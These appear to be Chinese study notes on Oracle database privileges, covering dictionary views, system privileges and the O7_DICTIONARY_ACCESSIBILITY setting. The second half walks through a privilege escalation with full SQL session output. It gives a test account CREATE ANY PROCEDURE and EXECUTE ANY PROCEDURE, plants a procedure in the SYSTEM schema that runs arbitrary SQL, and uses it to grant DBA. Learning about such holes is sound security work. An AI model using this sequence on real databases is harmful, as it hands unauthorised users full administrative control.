简单表:
dba_tablespaces:查看表空间名,类型,数据块大小等。
database_properties:查看DB的所有属性等,eg.default_temp_tablespace, nls_language
v$session:通过sid,username,status查看当前登录用户,username为空的是系统用户。
dba_users:查看所有的用户,密码,账号状态,过期时间,默认表空间,profile等。
dba_ts_quotas:查看每个用户对某种表空间的使用,username,tablespace_name,blocks
session_privs/session_roles:分别查看自己的权限和角色
能获取权限信息的几张视图:
dba_sys_privs:describes system privileges granted to users and roles. This view does not display the USERNAME
column.
user_sys_privs:describes system privileges granted to the current user. This view does not display the GRANTEE
column, but instead displays the USERNAME
column.看自己的系统权限。
session_privs:lists the privileges that are currently available to the user.
dba_tab_privs:describes the object grants for which the current user is the
object owner, grantor, or grantee.
dba_col_privs:describes all column object grants in the database.
系统权限select any table:可以人看到任何被创建的表,以dba开头的数据字典视图除外,这里就涉及到o7_dictionary_accessibility这个参数,决定了系统权限的限制(system privilege restriction),如果设置为ture,则允许接触到sys模式(sys schema)中所有的对象了。缺省当然是false的。
要删除别人的表要具备drop any table的系统权限:
SQL> show parameter o7
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
O7_DICTIONARY_ACCESSIBILITY boolean FALSE
SQL> alter system set o7_dictionary_accessibility = true;
alter system set o7_dictionary_accessibility = true
*
ERROR at line 1:
ORA-02095: specified initialization parameter cannot be modified
说明在内存中不能修改,只能在spfile里面修改。
SQL> alter system set o7_dictionary_accessibility = true scope = spfile;
System altered.
#重启后生效。这样具有select any table权限的哥们就能看到了,这个开关不要轻易开启。
汤大师检查oracle安全漏洞方法:
SQL> create user hacker identified by bbk_12345
2 default tablespace mytbs
3 quota unlimited on mytbs;
User created.
SQL> grant create session to hacker;
Grant succeeded.
SQL> grant create any procedure, execute any procedure to hacker;
Grant succeeded.
SQL> conn hacker/bbk_12345
Connected.
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE
SQL> select * from session_roles;
no rows selected
SQL> create procedure system.h1(h1_str in varchar2) as
2 begin
3 execute immediate h1_str;
4 end;
5 /
Procedure created.
SQL> execute system.h1('grant dba to hacker');
PL/SQL procedure successfully completed.
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
UNLIMITED TABLESPACE
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE
SQL> conn hacker/bbk_12345
Connected.
SQL> select * from session_privs; #这样便具有了DBA的所有权限
增删改DML是对象权限,要授权必须要有grant option,创建者是有的,查看别人创建的
表需要指出该创建者!select * from u01.t 但是后面加any以后就是系统权限了!
grant grant any object privileges to u02;由sys给一个普通用户,普通用户就可以
任意授权了
grant select on u01.m to u03;